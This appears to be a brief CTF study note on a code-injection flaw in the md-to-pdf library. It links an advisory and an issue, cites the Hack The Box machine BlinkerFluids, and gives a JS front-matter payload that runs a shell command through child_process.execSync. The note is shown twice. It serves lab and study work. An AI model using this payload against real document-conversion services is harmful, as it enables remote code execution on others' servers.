Need to read:
- https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
- https://github.com/simonhaenisch/md-to-pdf/issues/99
Example: HTB - BlinkerFluids
Payload
---js\n((require("child_process")).execSync("id > /tmp/RCE.txt"))\n---RCE
Need to read:
Example: HTB - BlinkerFluids
Payload
---js\n((require("child_process")).execSync("id > /tmp/RCE.txt"))\n---RCE